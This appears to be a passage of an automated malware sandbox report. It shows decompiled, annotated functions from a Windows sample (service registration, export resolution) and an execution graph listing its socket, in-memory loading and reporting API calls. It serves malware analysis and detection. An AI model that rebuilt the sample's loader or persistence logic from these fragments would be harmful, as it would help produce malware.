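The struct packs to exactly 0x50 bytes with name at offset 0x12, matching the listing, and an over-long name is cut to 0x3d characters with the terminator landing on +0x4f, which is why the sample's explicit store there is redundant rather than dangerous.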

                                                                                APIs
                                                                                • gethostbyaddr.WS2_32(00000000,00000004,00000002), ref: 004026C3
                                                                                • inet_ntoa.WS2_32(?), ref: 004026E4
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.310301101.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_qbxctmyn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: gethostbyaddrinet_ntoa
                                                                                • String ID: localcfg
                                                                                • API String ID: 2112563974-1857712256
                                                                                • Opcode ID: d53564beee30921141880bc566d8d3609085812ca2ea79526dfe3cb7d65e7849
                                                                                • Instruction ID: d2c247fa2f64166219b22d1ecfca1b9a377bc480b126e4bf322f1ec8134a793b
                                                                                • Opcode Fuzzy Hash: d53564beee30921141880bc566d8d3609085812ca2ea79526dfe3cb7d65e7849
                                                                                • Instruction Fuzzy Hash: 81F082321482097BEF006FA1ED09A9A379CEF09354F108876FA08EA0D0DBB5D950979C
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                 			E00409961() {
                                                                                 				/* ServiceMain: registers the control handler for the service name "htdzdeug", then walks the
                                                                                 				 * status through START_PENDING -> RUNNING -> STOPPED. The subcall list shows E00409892 calling
                                                                                 				 * SetServiceStatus with 0x413394, so 0x413394 is presumably the SERVICE_STATUS structure and
                                                                                 				 * E00409892's arguments are presumably (dwCurrentState, exit code, dwWaitHint). */
                                                                                 				int _t1;
                                                                                 				void* _t4;
                                                                                 				void* _t5;
                                                                                 				void* _t6;
                                                                                 				intOrPtr _t10;
                                                                                 				int _t11;
                                                                                 
                                                                                 				_t1 = RegisterServiceCtrlHandlerA("htdzdeug", E00409867);
                                                                                 				 *0x413390 = _t1;                             /* SERVICE_STATUS_HANDLE */
                                                                                 				if(_t1 == 0) {
                                                                                 					L6:
                                                                                 					return _t1;
                                                                                 				}
                                                                                 				 *0x413394 = 0x10;                            /* dwServiceType = SERVICE_WIN32_OWN_PROCESS */
                                                                                 				 *0x4133a4 = 0;                               /* +0x10 into SERVICE_STATUS: dwServiceSpecificExitCode */
                                                                                 				_t1 = E00409892(2, 0, 0xbb8);                 /* SERVICE_START_PENDING, wait hint 0xbb8 = 3000 ms */
                                                                                 				_t6 = _t5 + 0xc;
                                                                                 				if(_t1 != 0) {
                                                                                 					_t1 = E00409892(4, 0, 0);                 /* SERVICE_RUNNING */
                                                                                 					_t6 = _t6 + 0xc;
                                                                                 					_t10 =  *0x4133b0; // 0x68
                                                                                 					if(_t10 != 0) {
                                                                                 						_t1 = E004098F2(_t4);                 /* service body; its subcall list shows Sleep(0x3e8) = 1000 ms */
                                                                                 					}
                                                                                 				}
                                                                                 				_t11 =  *0x413390; // 0x5cea48
                                                                                 				if(_t11 == 0) {
                                                                                 					goto L6;
                                                                                 				} else {
                                                                                 					return E00409892(1, 0, 0);                /* SERVICE_STOPPED */
                                                                                 				}
                                                                                 			}
                                                                                 
                                                                                 Addresses (one per statement of the listing above; 0x00000000 marks a line with no own address): 0x0040996c 0x00409974 0x0040997b 0x004099cf 0x004099cf 0x004099cf 0x00409985 0x0040998f 0x00409995 0x0040999a 0x0040999f 0x004099a5 0x004099aa 0x004099ad 0x004099b3 0x004099b5 0x004099b5 0x004099b3 0x004099ba 0x004099c0 0x00000000 0x004099c2 0x00000000 0x004099cb

                                                                                APIs
                                                                                • RegisterServiceCtrlHandlerA.ADVAPI32(htdzdeug,Function_00009867), ref: 0040996C
                                                                                  • Part of subcall function 00409892: SetServiceStatus.SECHOST(00413394), ref: 004098EB
                                                                                  • Part of subcall function 004098F2: Sleep.KERNEL32(000003E8,00000100,004122F8,0040A3C7), ref: 00409909
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.310301101.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_qbxctmyn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Service$CtrlHandlerRegisterSleepStatus
                                                                                • String ID: H\$htdzdeug
                                                                                • API String ID: 1317371667-2215252167
                                                                                • Opcode ID: ca430b9e4608bea333335a69787ed6bca2f17ce8de0e46e285fa1f472da398df
                                                                                • Instruction ID: 8090f714d00e8c700c7feefac428721607cdcb0429ac14865b211bf96103553c
                                                                                • Opcode Fuzzy Hash: ca430b9e4608bea333335a69787ed6bca2f17ce8de0e46e285fa1f472da398df
                                                                                • Instruction Fuzzy Hash: 55F054F2550308AEE2106F616D87B537548A711349F08C03FB919693D3EBBD4D44822D
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • inet_addr.WS2_32(00000001), ref: 00402693
                                                                                • gethostbyname.WS2_32(00000001), ref: 0040269F
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.310301101.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_qbxctmyn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: gethostbynameinet_addr
                                                                                • String ID: time_cfg
                                                                                • API String ID: 1594361348-2401304539
                                                                                • Opcode ID: f9db606e706a3ea9b2ac4bed422f000f2ba59a3d29e70a13aafe2ea60d03e68c
                                                                                • Instruction ID: 506fadec158220b53989f58c32679351ed61dc8f5455c60e8cf87b9af1828998
                                                                                • Opcode Fuzzy Hash: f9db606e706a3ea9b2ac4bed422f000f2ba59a3d29e70a13aafe2ea60d03e68c
                                                                                • Instruction Fuzzy Hash: 9CE08C302040219FCB108B28F848AC637A4AF06330F0189A2F840E32E0C7B89CC08688
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                 			E0040EAE4(CHAR* _a4) {
                                                                                 				/* Lazily loads ntdll.dll once, caching the module handle at 0x4136f4, and resolves the export
                                                                                 				 * named by _a4 with GetProcAddress. This is how the sample reaches functions that are absent from
                                                                                 				 * its import table; the stack at the call site below carries the string "_alldiv". The cached
                                                                                 				 * handle is never released and the check is not atomic, which is harmless for a LoadLibrary handle. */
                                                                                 				struct HINSTANCE__* _t2;
                                                                                 
                                                                                 				_t2 =  *0x4136f4; // 0x0
                                                                                 				if(_t2 != 0) {
                                                                                 					L3:
                                                                                 					return GetProcAddress(_t2, _a4);
                                                                                 				} else {
                                                                                 					_t2 = LoadLibraryA("ntdll.dll");
                                                                                 					 *0x4136f4 = _t2;
                                                                                 					if(_t2 != 0) {
                                                                                 						goto L3;
                                                                                 					} else {
                                                                                 						return _t2;                           /* NULL: ntdll.dll could not be loaded */
                                                                                 					}
                                                                                 				}
                                                                                			}





APIs
• LoadLibraryA.KERNEL32(ntdll.dll,0040EB54,_alldiv,0040F0B7,80000001,00000000,00989680,00000000,?,?,?,0040E342,00000000,76A1F210,80000001,00000000), ref: 0040EAF2
• GetProcAddress.KERNEL32(00000000,00000000), ref: 0040EB07
Strings
Memory Dump Source
• Source File: 00000011.00000002.310301101.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_400000_qbxctmyn.jbxd
Yara matches
Similarity
• API ID: AddressLibraryLoadProc
• String ID: ntdll.dll
• API String ID: 2574300362-2227199552
• Opcode ID: b4eb004c93ce830f66033c1bec013b2cb76b73adf8dbcf645c2d99c100687d31
• Instruction ID: 7b5812d5d2c037db56fb7cc720bc5ad28be2e092f3141d28ea6626f847aa1f88
• Opcode Fuzzy Hash: b4eb004c93ce830f66033c1bec013b2cb76b73adf8dbcf645c2d99c100687d31
• Instruction Fuzzy Hash: D0D0C934600302ABCF22CF65AE1EA867AACAB54702B40C436B406E1670E778E994DA0C
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00E32F88: GetModuleHandleA.KERNEL32(?), ref: 00E32FA1
  • Part of subcall function 00E32F88: LoadLibraryA.KERNEL32(?), ref: 00E32FB1
• GetProcessHeap.KERNEL32(00000000,00000000), ref: 00E331DA
• HeapFree.KERNEL32(00000000), ref: 00E331E1
Memory Dump Source
• Source File: 00000011.00000002.310875987.0000000000E30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_e30000_qbxctmyn.jbxd
Yara matches
Similarity
• API ID: Heap$FreeHandleLibraryLoadModuleProcess
• String ID:
• API String ID: 1017166417-0
• Opcode ID: 6d22c46e4b2bbf8f956e586da185c112e243b929c4a2d348202b24ffe9e68596
• Instruction ID: e4710c1319efc4a86c336793d044e9fdccf72480af68a12908dfe76da7ce7d2b
• Opcode Fuzzy Hash: 6d22c46e4b2bbf8f956e586da185c112e243b929c4a2d348202b24ffe9e68596
• Instruction Fuzzy Hash: 25519C7190020AEFCF059F68D8889FABBB5FF15304F145569EC96E7221E732DA19CB90
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
E00402F22(intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
    signed int _v8;
    void* _v12;
    char _v368;
    void* _t64;
    signed short* _t66;
    intOrPtr* _t67;
    intOrPtr* _t72;
    intOrPtr* _t76;
    intOrPtr* _t82;
    short _t86;
    intOrPtr* _t87;
    signed int _t94;
    intOrPtr _t96;
    signed int _t99;
    short* _t100;
    void* _t101;
    void* _t102;
    void* _t103;
    intOrPtr _t109;
    intOrPtr _t110;
    intOrPtr _t111;
    intOrPtr _t114;
    void* _t115;
    intOrPtr* _t116;
    void* _t117;
    signed int _t118;
    void* _t121;
    void* _t122;
    void* _t123;
    void* _t124;

    _t116 = _a12;
    _t94 = 0;
    *_t116 = 0;
    _t117 = E00402D21(_a4);
    if(_t117 != 0) {
        if( *_t117 != 0) {
            _v12 = _t117;
            _a12 = _a8;
            while(_t94 < 5) {
                _t9 = _t117 + 8; // 0x8
                _t104 = _t9;
                _t82 = _t9;
                _t10 = _t82 + 1; // 0x9
                _v8 = _t10;
                do {
                    _t114 = *_t82;
                    _t82 = _t82 + 1;
                } while (_t114 != 0);
                E0040EE08(_a12, _t104, _t82 - _v8 + 1);
                _t86 = *((intOrPtr*)(_t117 + 4));
                _a12 = _a12 + 0x100;
                _t122 = _t122 + 0xc;
                *_t116 = *_t116 + 1;
                _t117 = *_t117;
                *((short*)(_t121 + _t94 * 2 - 0x6c)) = _t86;
                _t94 = _t94 + 1;
                if(_t117 != 0) {
                    continue;
                }
                break;
            }
            HeapFree(GetProcessHeap(), 0, _v12);
            _v8 = _v8 & 0x00000000;
            if( *_t116 == 1) {
                L24:
                return 1;
            }
            _t64 = *_t116 - 1;
            _a12 = _a8;
            do {
                _t118 = _v8;
                _t99 = _t118;
                if(_t118 >= *_t116 - 1) {
                    L17:
                    _t66 = _t121 + _v8 * 2 - 0x6c;
                    _t100 = _t121 + _t118 * 2 - 0x6c;
                    *_t66 = *_t100;
                    _t67 = _a12;
                    *_t100 = *_t66 & 0x0000ffff;
                    _t101 = _t67 + 1;
                    do {
                        _t109 = *_t67;
                        _t67 = _t67 + 1;
                    } while (_t109 != 0);
                    E0040EE08( &_v368, _a12, _t67 - _t101 + 1);
                    _t123 = _t122 + 0xc;
                    _t120 = (_t118 << 8) + _a8;
                    _t72 = (_t118 << 8) + _a8;
                    _t102 = _t72 + 1;
                    do {
                        _t110 = *_t72;
                        _t72 = _t72 + 1;
                    } while (_t110 != 0);
                    E0040EE08(_a12, _t120, _t72 - _t102 + 1);
                    _t76 = &_v368;
                    _t124 = _t123 + 0xc;
                    _t103 = _t76 + 1;
                    do {
                        _t111 = *_t76;
                        _t76 = _t76 + 1;
                    } while (_t111 != 0);
                    goto L23;
                } else {
                    goto L14;
                }
                do {
                    L14:
                    if( *((intOrPtr*)(_t121 + _t99 * 2 - 0x6a)) < *((intOrPtr*)(_t121 + _t99 * 2 - 0x6c))) {
                        _t32 = _t99 + 1; // 0x1
                        _t118 = _t32;
                    }
                    _t99 = _t99 + 1;
                } while (_t99 < _t64);
                goto L17;
                L23:
                E0040EE08(_t120, &_v368, _t76 - _t103 + 1);
                _a12 = _a12 + 0x100;
                _t122 = _t124 + 0xc;
                _v8 = _v8 + 1;
                _t64 = *_t116 - 1;
            } while (_v8 < _t64);
            goto L24;
        }
        _t3 = _t117 + 8; // 0x8
        _t105 = _t3;
        _t87 = _t3;
        _t4 = _t87 + 1; // 0x9
        _t115 = _t4;
        do {
            _t96 = *_t87;
            _t87 = _t87 + 1;
        } while (_t96 != 0);
        E0040EE08(_a8, _t105, _t87 - _t115 + 1);
        *_t116 = *_t116 + 1;
        HeapFree(GetProcessHeap(), 0, _t117);
        goto L24;
    }
    return 0;
}


APIs
  • Part of subcall function 00402D21: GetModuleHandleA.KERNEL32(00000000,74D0EA30,?,00000000,00402F01,?,004020FF,00412000), ref: 00402D3A
  • Part of subcall function 00402D21: LoadLibraryA.KERNEL32(?), ref: 00402D4A
• GetProcessHeap.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00402F73
• HeapFree.KERNEL32(00000000), ref: 00402F7A
Memory Dump Source
• Source File: 00000011.00000002.310301101.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_400000_qbxctmyn.jbxd
Yara matches
Similarity
• API ID: Heap$FreeHandleLibraryLoadModuleProcess
• String ID:
• API String ID: 1017166417-0
• Opcode ID: 17a9aa356eb7964f79448f848511744e029a14576c0ff14f59890d2228000c73
• Instruction ID: 68d3b74a61d8da24685d2c7d21854d87d7e5c343c8b3ec1e3967b08f84d9f298
• Opcode Fuzzy Hash: 17a9aa356eb7964f79448f848511744e029a14576c0ff14f59890d2228000c73
• Instruction Fuzzy Hash: C251E23190020A9FCF01DF64D8889FABB79FF15304F10457AEC95E7290E7769A19CB88
Uniqueness

Uniqueness Score: -1.00%

Execution Graph

Execution Coverage: 14.6%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 0.7%
Total number of Nodes: 1807
                                                                                Total number of Limit Nodes:18
                                                                                execution_graph 7599 124e92 GetTickCount 7600 124ec0 InterlockedExchange 7599->7600 7601 124ec9 7600->7601 7602 124ead GetTickCount 7600->7602 7602->7601 7603 124eb8 Sleep 7602->7603 7603->7600 8082 1243d2 8083 1243e0 8082->8083 8084 1243ef 8083->8084 8085 121940 4 API calls 8083->8085 8085->8084 7604 125d93 IsBadWritePtr 7605 125ddc 7604->7605 7606 125da8 7604->7606 7606->7605 7608 125389 7606->7608 7615 124bd1 GetTickCount 7608->7615 7612 1253ad 7613 124ae6 8 API calls 7612->7613 7614 125407 7612->7614 7613->7612 7614->7605 7616 124bff InterlockedExchange 7615->7616 7617 124c08 7616->7617 7618 124bec GetTickCount 7616->7618 7620 124ae6 7617->7620 7618->7617 7619 124bf7 Sleep 7618->7619 7619->7616 7621 124af3 7620->7621 7623 124b03 7620->7623 7622 12ebed 8 API calls 7621->7622 7622->7623 7623->7612 8086 125453 8091 12543a 8086->8091 8094 125048 8091->8094 8095 124bd1 4 API calls 8094->8095 8096 125056 8095->8096 8097 12ec2e codecvt 4 API calls 8096->8097 8098 12508b 8096->8098 8097->8098 8099 124ed3 8104 124c9a 8099->8104 8105 124cd8 8104->8105 8107 124ca9 8104->8107 8106 12ec2e codecvt 4 API calls 8106->8105 8107->8106 7624 126511 wsprintfA IsBadReadPtr 7625 12656a htonl htonl wsprintfA wsprintfA 7624->7625 7626 12674e 7624->7626 7630 1265f3 7625->7630 7627 12e318 23 API calls 7626->7627 7628 126753 ExitProcess 7627->7628 7629 12668a GetCurrentProcess StackWalk64 7629->7630 7631 1266a0 wsprintfA 7629->7631 7630->7629 7630->7631 7633 126652 wsprintfA 7630->7633 7632 1266ba 7631->7632 7634 126712 wsprintfA 7632->7634 7635 1266da wsprintfA 7632->7635 7636 1266ed wsprintfA 7632->7636 7633->7630 7637 12e8a1 30 API calls 7634->7637 7635->7636 7636->7632 7638 126739 7637->7638 7639 12e318 23 API calls 7638->7639 7640 126741 7639->7640 8108 128c51 8109 128c86 8108->8109 8110 128c5d 8108->8110 8111 128c8b lstrcmpA 8109->8111 8121 128c7b 8109->8121 8112 128c6e 8110->8112 8113 128c7d 8110->8113 
8114 128c9e 8111->8114 8111->8121 8122 128be7 8112->8122 8130 128bb3 8113->8130 8115 128cad 8114->8115 8118 12ec2e codecvt 4 API calls 8114->8118 8120 12ebcc 4 API calls 8115->8120 8115->8121 8118->8115 8120->8121 8123 128bf2 8122->8123 8124 128c2a 8122->8124 8125 128bb3 6 API calls 8123->8125 8124->8121 8126 128bf8 8125->8126 8134 126410 8126->8134 8128 128c01 8128->8124 8149 126246 8128->8149 8131 128bbc 8130->8131 8132 128be4 8130->8132 8131->8132 8133 126246 6 API calls 8131->8133 8133->8132 8135 126421 8134->8135 8136 12641e 8134->8136 8137 12643a 8135->8137 8138 12643e VirtualAlloc 8135->8138 8136->8128 8137->8128 8139 126472 8138->8139 8140 12645b VirtualAlloc 8138->8140 8141 12ebcc 4 API calls 8139->8141 8140->8139 8148 1264fb 8140->8148 8142 126479 8141->8142 8142->8148 8159 126069 8142->8159 8145 1264da 8147 126246 6 API calls 8145->8147 8145->8148 8147->8148 8148->8128 8150 1262b3 8149->8150 8152 126252 8149->8152 8150->8124 8151 126297 8154 1262a0 VirtualFree 8151->8154 8155 1262ad 8151->8155 8152->8151 8153 12628f 8152->8153 8156 126281 FreeLibrary 8152->8156 8157 12ec2e codecvt 4 API calls 8153->8157 8154->8155 8158 12ec2e codecvt 4 API calls 8155->8158 8156->8152 8157->8151 8158->8150 8160 126090 IsBadReadPtr 8159->8160 8162 126089 8159->8162 8160->8162 8165 1260aa 8160->8165 8161 1260c0 LoadLibraryA 8161->8162 8161->8165 8162->8145 8169 125f3f 8162->8169 8163 12ebcc 4 API calls 8163->8165 8164 12ebed 8 API calls 8164->8165 8165->8161 8165->8162 8165->8163 8165->8164 8166 126191 IsBadReadPtr 8165->8166 8167 126141 GetProcAddress 8165->8167 8168 126155 GetProcAddress 8165->8168 8166->8162 8166->8165 8167->8165 8168->8165 8170 125fe6 8169->8170 8172 125f61 8169->8172 8170->8145 8171 125fbf VirtualProtect 8171->8170 8171->8172 8172->8170 8172->8171 7641 128314 7642 12675c 21 API calls 7641->7642 7643 128324 7642->7643 8173 12195b 8174 121971 8173->8174 8175 12196b 8173->8175 8176 12ec2e codecvt 4 API calls 8175->8176 8176->8174 7644 125099 7645 124bd1 4 
API calls 7644->7645 7646 1250a2 7645->7646 7647 12f483 WSAStartup 7648 12f304 7651 12f26d setsockopt setsockopt setsockopt setsockopt setsockopt 7648->7651 7650 12f312 7651->7650 7652 125b84 IsBadWritePtr 7653 125b99 7652->7653 7654 125b9d 7652->7654 7655 124bd1 4 API calls 7654->7655 7656 125bcc 7655->7656 7659 125472 7656->7659 7678 124763 7659->7678 7661 125b58 7684 124699 7661->7684 7664 124763 lstrlenA 7665 125b6e 7664->7665 7705 124f9f 7665->7705 7667 125b79 7668 124ae6 8 API calls 7669 125549 lstrlenA 7668->7669 7677 12548a 7669->7677 7670 125472 13 API calls 7670->7677 7672 12558d lstrcpynA 7672->7677 7673 124ae6 8 API calls 7673->7677 7674 125a9f lstrcpyA 7674->7677 7675 125935 lstrcpynA 7675->7677 7676 1258e7 lstrcpyA 7676->7677 7677->7661 7677->7668 7677->7670 7677->7672 7677->7673 7677->7674 7677->7675 7677->7676 7682 12ef7c lstrlenA lstrlenA lstrlenA 7677->7682 7680 12477a 7678->7680 7679 124859 7679->7677 7680->7679 7681 12480d lstrlenA 7680->7681 7681->7680 7683 12efb4 7682->7683 7683->7677 7710 1245b3 7684->7710 7687 1245b3 7 API calls 7688 1246c6 7687->7688 7689 1245b3 7 API calls 7688->7689 7690 1246d8 7689->7690 7691 1245b3 7 API calls 7690->7691 7692 1246ea 7691->7692 7693 1245b3 7 API calls 7692->7693 7694 1246ff 7693->7694 7695 1245b3 7 API calls 7694->7695 7696 124711 7695->7696 7697 1245b3 7 API calls 7696->7697 7698 124723 7697->7698 7699 12ef7c 3 API calls 7698->7699 7700 124735 7699->7700 7701 12ef7c 3 API calls 7700->7701 7702 12474a 7701->7702 7703 12ef7c 3 API calls 7702->7703 7704 12475c 7703->7704 7704->7664 7706 124fac 7705->7706 7709 124fb0 7705->7709 7706->7667 7707 124ffd 7707->7667 7708 124fd5 IsBadCodePtr 7708->7709 7709->7707 7709->7708 7711 1245c1 7710->7711 7712 1245c8 7710->7712 7713 12ebcc 4 API calls 7711->7713 7714 12ebcc 4 API calls 7712->7714 7716 1245e1 7712->7716 7713->7712 7714->7716 7715 124691 7715->7687 7716->7715 7717 12ef7c 3 API calls 7716->7717 7717->7716 7718 125c05 IsBadWritePtr 7719 125c24 IsBadWritePtr 
7718->7719 7726 125ca6 7718->7726 7720 125c32 7719->7720 7719->7726 7721 125c82 7720->7721 7722 124bd1 4 API calls 7720->7722 7723 124bd1 4 API calls 7721->7723 7722->7721 7724 125c90 7723->7724 7725 125472 18 API calls 7724->7725 7725->7726 7736 12448b 7737 124499 7736->7737 7738 1244ab 7737->7738 7740 121940 7737->7740 7741 12ec2e codecvt 4 API calls 7740->7741 7742 121949 7741->7742 7742->7738 8181 12e749 8182 12dd05 6 API calls 8181->8182 8183 12e751 8182->8183 8184 12e781 lstrcmpA 8183->8184 8185 12e799 8183->8185 8184->8183 7743 125e0d 7746 1250dc 7743->7746 7745 125e20 7747 124bd1 4 API calls 7746->7747 7748 1250f2 7747->7748 7749 124ae6 8 API calls 7748->7749 7755 1250ff 7749->7755 7750 125130 7752 124ae6 8 API calls 7750->7752 7751 124ae6 8 API calls 7753 125110 lstrcmpA 7751->7753 7754 125138 7752->7754 7753->7750 7753->7755 7757 12513e 7754->7757 7758 12516e 7754->7758 7759 124ae6 8 API calls 7754->7759 7755->7750 7755->7751 7756 124ae6 8 API calls 7755->7756 7756->7755 7757->7745 7758->7757 7761 124ae6 8 API calls 7758->7761 7760 12515e 7759->7760 7760->7758 7763 124ae6 8 API calls 7760->7763 7762 1251b6 7761->7762 7789 124a3d 7762->7789 7763->7758 7766 124ae6 8 API calls 7767 1251c7 7766->7767 7768 124ae6 8 API calls 7767->7768 7769 1251d7 7768->7769 7770 124ae6 8 API calls 7769->7770 7771 1251e7 7770->7771 7771->7757 7772 124ae6 8 API calls 7771->7772 7773 125219 7772->7773 7774 124ae6 8 API calls 7773->7774 7775 125227 7774->7775 7776 124ae6 8 API calls 7775->7776 7777 12524f lstrcpyA 7776->7777 7778 124ae6 8 API calls 7777->7778 7783 125263 7778->7783 7779 124ae6 8 API calls 7780 125315 7779->7780 7781 124ae6 8 API calls 7780->7781 7782 125323 7781->7782 7784 124ae6 8 API calls 7782->7784 7783->7779 7786 125331 7784->7786 7785 124ae6 8 API calls 7785->7786 7786->7757 7786->7785 7787 124ae6 8 API calls 7786->7787 7788 125351 lstrcmpA 7787->7788 7788->7757 7788->7786 7790 124a4a 7789->7790 7793 124a53 7789->7793 7791 12ebed 8 API calls 7790->7791 
7791->7793 7792 124a78 7795 124aa3 7792->7795 7796 124a8e 7792->7796 7793->7792 7794 12ebed 8 API calls 7793->7794 7794->7792 7797 124a9b 7795->7797 7798 12ebed 8 API calls 7795->7798 7796->7797 7799 12ec2e codecvt 4 API calls 7796->7799 7797->7766 7798->7797 7799->7797 7800 124c0d 7801 124ae6 8 API calls 7800->7801 7802 124c17 7801->7802 8186 125e4d 8187 125048 8 API calls 8186->8187 8188 125e55 8187->8188 8189 125e64 8188->8189 8190 121940 4 API calls 8188->8190 8190->8189 7803 12be31 lstrcmpiA 7804 12be55 lstrcmpiA 7803->7804 7810 12be71 7803->7810 7805 12be61 lstrcmpiA 7804->7805 7804->7810 7805->7810 7815 12bfc8 7805->7815 7806 12bf62 lstrcmpiA 7807 12bf70 7806->7807 7808 12bf77 lstrcmpiA 7806->7808 7811 12bfc2 7807->7811 7813 12ec2e codecvt 4 API calls 7807->7813 7807->7815 7808->7807 7809 12bf8c lstrcmpiA 7808->7809 7809->7807 7810->7806 7814 12ebcc 4 API calls 7810->7814 7812 12ec2e codecvt 4 API calls 7811->7812 7812->7815 7813->7807 7818 12beb6 7814->7818 7816 12bf5a 7816->7806 7817 12ebcc 4 API calls 7817->7818 7818->7806 7818->7815 7818->7816 7818->7817 7819 125d34 IsBadWritePtr 7820 125d47 7819->7820 7821 125d4a 7819->7821 7822 125389 12 API calls 7821->7822 7823 125d80 7822->7823 7824 12b535 7825 12b566 7824->7825 7826 12ebcc 4 API calls 7825->7826 7827 12b587 7826->7827 7828 12ebcc 4 API calls 7827->7828 7840 12b590 7828->7840 7829 12bdcd InterlockedDecrement 7830 12bde2 7829->7830 7832 12ec2e codecvt 4 API calls 7830->7832 7833 12bdea 7832->7833 7834 12ec2e codecvt 4 API calls 7833->7834 7836 12bdf2 7834->7836 7835 12bdb7 Sleep 7835->7840 7837 12be05 7836->7837 7839 12ec2e codecvt 4 API calls 7836->7839 7838 12bdcc 7838->7829 7839->7837 7840->7829 7840->7835 7840->7838 7841 12ebed 8 API calls 7840->7841 7844 12b6b6 lstrlenA 7840->7844 7845 1230b5 2 API calls 7840->7845 7846 12b6ed lstrcpyA 7840->7846 7847 12e819 11 API calls 7840->7847 7850 12b731 lstrlenA 7840->7850 7851 12b71f lstrcmpA 7840->7851 7852 12b772 GetTickCount 7840->7852 7853 12bd49 
InterlockedIncrement 7840->7853 7856 12bc5b InterlockedIncrement 7840->7856 7857 12b7ce InterlockedIncrement 7840->7857 7860 12b912 GetTickCount 7840->7860 7861 12b826 InterlockedIncrement 7840->7861 7862 12b932 GetTickCount 7840->7862 7863 12bcdc closesocket 7840->7863 7865 1238f0 6 API calls 7840->7865 7867 12ab81 lstrcpynA InterlockedIncrement 7840->7867 7870 12bba6 InterlockedIncrement 7840->7870 7872 12bc4c closesocket 7840->7872 7874 125ce1 22 API calls 7840->7874 7875 12ba71 wsprintfA 7840->7875 7877 12a7c1 22 API calls 7840->7877 7878 12ef1e lstrlenA 7840->7878 7879 125ded 12 API calls 7840->7879 7880 12a688 GetTickCount 7840->7880 7881 123e10 7840->7881 7884 123e4f 7840->7884 7887 12384f 7840->7887 7907 12a7a3 inet_ntoa 7840->7907 7914 12abee 7840->7914 7926 121feb GetTickCount 7840->7926 7947 123cfb 7840->7947 7950 12b3c5 7840->7950 7981 12ab81 7840->7981 7841->7840 7844->7840 7845->7840 7899 125ce1 7846->7899 7847->7840 7850->7840 7851->7840 7851->7850 7852->7840 7993 12a628 7853->7993 7856->7840 7909 12acd7 7857->7909 7860->7840 7861->7852 7862->7840 7864 12bc6d InterlockedIncrement 7862->7864 7863->7840 7864->7840 7865->7840 7867->7840 7870->7840 7872->7840 7874->7840 7927 12a7c1 7875->7927 7877->7840 7878->7840 7879->7840 7880->7840 7882 1230fa 4 API calls 7881->7882 7883 123e1d 7882->7883 7883->7840 7885 1230fa 4 API calls 7884->7885 7886 123e5c 7885->7886 7886->7840 7888 1230fa 4 API calls 7887->7888 7889 123863 7888->7889 7890 1238b9 7889->7890 7891 123889 7889->7891 7898 1238b2 7889->7898 8002 1235f9 7890->8002 7996 123718 7891->7996 7896 123718 6 API calls 7896->7898 7897 1235f9 6 API calls 7897->7898 7898->7840 7900 125cf4 7899->7900 7901 125cec 7899->7901 7903 124bd1 4 API calls 7900->7903 7902 124bd1 4 API calls 7901->7902 7902->7900 7904 125d02 7903->7904 7905 125472 18 API calls 7904->7905 7906 125d1c 7905->7906 7906->7840 7908 12a7b9 7907->7908 7908->7840 7910 12f315 14 API calls 7909->7910 7911 12aceb 7910->7911 7912 12acff 7911->7912 7913 
12f315 14 API calls 7911->7913 7912->7840 7913->7912 7915 12abfb 7914->7915 7919 12ac65 7915->7919 8008 122f22 7915->8008 7917 12ac23 7917->7919 7923 122684 2 API calls 7917->7923 7918 12f315 14 API calls 7918->7919 7919->7918 7920 12ac6f 7919->7920 7925 12ac8a 7919->7925 7921 12ab81 2 API calls 7920->7921 7922 12ac81 7921->7922 8016 1238f0 7922->8016 7923->7917 7925->7840 7926->7840 7928 12a7df 7927->7928 7929 12a87d lstrlenA send 7927->7929 7928->7929 7936 12a7fa wsprintfA 7928->7936 7937 12a80a 7928->7937 7939 12a8f2 7928->7939 7930 12a899 7929->7930 7931 12a8bf 7929->7931 7932 12a8a5 wsprintfA 7930->7932 7940 12a89e 7930->7940 7933 12a8c4 send 7931->7933 7931->7939 7932->7940 7935 12a8d8 wsprintfA 7933->7935 7933->7939 7934 12a978 recv 7934->7939 7941 12a982 7934->7941 7935->7940 7936->7937 7937->7929 7938 12a9b0 wsprintfA 7938->7940 7939->7934 7939->7938 7939->7941 7940->7840 7941->7940 7942 1230b5 2 API calls 7941->7942 7943 12ab05 7942->7943 7944 12e819 11 API calls 7943->7944 7945 12ab17 7944->7945 7946 12a7a3 inet_ntoa 7945->7946 7946->7940 7948 1230fa 4 API calls 7947->7948 7949 123d0b 7948->7949 7949->7840 7951 125ce1 22 API calls 7950->7951 7952 12b3e6 7951->7952 7953 125ce1 22 API calls 7952->7953 7954 12b404 7953->7954 7956 12ef7c 3 API calls 7954->7956 7962 12b440 7954->7962 7955 12ef7c 3 API calls 7957 12b458 wsprintfA 7955->7957 